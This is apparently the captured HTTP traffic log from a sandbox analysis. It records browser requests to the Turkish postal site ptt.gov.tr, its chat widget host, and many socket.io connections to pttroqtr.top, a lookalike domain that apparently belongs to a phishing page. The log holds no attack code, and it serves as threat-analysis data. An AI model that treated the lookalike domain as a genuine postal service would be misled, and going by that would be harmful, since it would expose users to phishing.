Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5698-10f078fe5b68f680.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjf1e&sid=DijwWc-tALPoXXo3AEf9 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjf1i&sid=DijwWc-tALPoXXo3AEf9 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjfG8&sid=DijwWc-tALPoXXo3AEf9 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/doviz-kurlari-5a26b114db728c07.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /static/assets/js/linkify.html.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /_next/static/css/386d6f9094f2dfbc.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /Sayfalar/Posta/PulVeFilateliUst.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjg1S HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=PAIOn2iXLFZsVKTaAEgA HTTP/1.1Host: pttroqtr.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttroqtr.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: CypoyJeQWvUACdOgumBsDg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjgdg&sid=PAIOn2iXLFZsVKTaAEgA HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/bootstrap/js/bootstrap.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"If-None-Match: "66e91fef-90b5"If-Modified-Since: Tue, 17 Sep 2024 09:21:35 GMTsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjg1S HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjh46&sid=PAIOn2iXLFZsVKTaAEgA HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Posta/UETS.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1443587032.1727494784; _ga_SFQ172Y7CH=GS1.1.1727494784.1.1.1727494794.0.0.0
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjgdd&sid=PAIOn2iXLFZsVKTaAEgA HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjgdg&sid=PAIOn2iXLFZsVKTaAEgA HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjhL-&sid=PAIOn2iXLFZsVKTaAEgA HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjh46&sid=PAIOn2iXLFZsVKTaAEgA HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjh4H&sid=PAIOn2iXLFZsVKTaAEgA HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjiTg HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjiTg HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=r_NtitDKgtItMN5FAEgD HTTP/1.1Host: pttroqtr.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttroqtr.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: hose+JqJtnsCVtN3B3yA+g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjih1&sid=r_NtitDKgtItMN5FAEgD HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Posta/KayitliElektronikPosta.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1443587032.1727494784; _ga_SFQ172Y7CH=GS1.1.1727494784.1.1.1727494799.0.0.0
